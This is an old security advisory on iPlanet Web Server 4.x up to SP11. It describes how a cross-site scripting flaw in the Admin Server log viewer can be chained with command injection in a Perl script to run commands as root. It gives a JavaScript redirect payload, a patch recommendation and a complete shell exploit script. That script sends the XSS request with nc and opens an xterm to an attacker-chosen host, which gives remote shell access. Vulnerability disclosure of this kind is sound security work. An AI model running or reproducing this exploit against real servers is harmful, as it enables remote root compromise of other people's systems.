|
|
|
|
| |
Under certain circumstances an attacker can execute commands (usually as root), using the combination of two security vulnerabilities on iPlanet Web Server 4.* up to SP11 (NG-XSS).
These two vulnerabilities are:
- Insecure open()s at Admin Server PERL scripts
- Cross Site Scripting
The only need will be, through social skills, to have the Administrator review the logs within iPlanet Admin Server.
This vulnerability can not be exploited on a 6.* version because XSS was silently fixed in these releases. |
| |
Credit:
The information has been provided by Ferm?n J. Serna of Next Generation Security Technologies.
|
| |
Vulnerable systems:
* iPlanet WebServer version 4.* up to SP11
If we consider each vulnerability alone, we have no chance to execute commands at the iPlanet Web Server since XSS payload is Browser Hijacking and the vulnerable PERL script is protected by an authentication schema.
iPlanet Web Server suffers from a XSS vulnerability when the Administrator reviews the error logs through iPlanet Admin Server. XSS triggers once the Administrator has successfully logged on the Admin Server.
The trick is not to exploit the open() PERL vulnerability directly, but use instead the XSS to redirect the Administrator's browser to the URL that will cause the open() command injection. Since he is already authenticated, we bypass the authentication schema.
We will use the following JavaScript code:
<scr*ipt>
window.location="/https-admserv/bin/perl/importInfo?dir=|<command>%00";
</scr*ipt>
Recommendations:
Avoid iPlanet's Admin Server usage, until Sun releases a patch for these vulnerabilities. Alternatively upgrade to iPlanet v.6.*
Exploit:
#!/bin/sh
#
# iPlanet Remote root exploit
# Tested versions: 4.* up to SP11
#
# By: Ferm?n J. Serna CTO, NGSEC
# http://www.ngsec.com <fjserna@ngsec.com>
#
# Madrid, 09/10/2002
echo "iPlanet (4.* up to SP11) Remote root exploit by Fermin J. Serna CTO, NGSEC"
echo "http://www.ngsec.com <fjserna@ngsec.com>"
echo
if [ $# != "3" ]
then
echo "Usage: $0 <Web_Server> <Web_port> <IP_to_send_xterm>"
exit
fi
echo "1.- Setting xhost +$1"
xhost +$1
echo
echo "2.- Building XSS string:"
CADENA="<script>window.location=\"/https-admserv/bin/perl/importInfo%3Fdir=|/usr/openwin/bin/xterm+-display+$3:0%2500\";</script>"
echo $CADENA
echo
echo "3.- Sending HTTP request:"
SEND="GET /$CADENA HTTP/1.0"
echo "$SEND"
(echo "$SEND"; echo "Host: $1"; echo; echo) | nc $1 $2
echo
echo
echo "4.- Time to wait for the xterm :P. Admin should review Web Server logs using Admin Server Tool."
echo
|
|
|
|
|
|
|
|
|
|
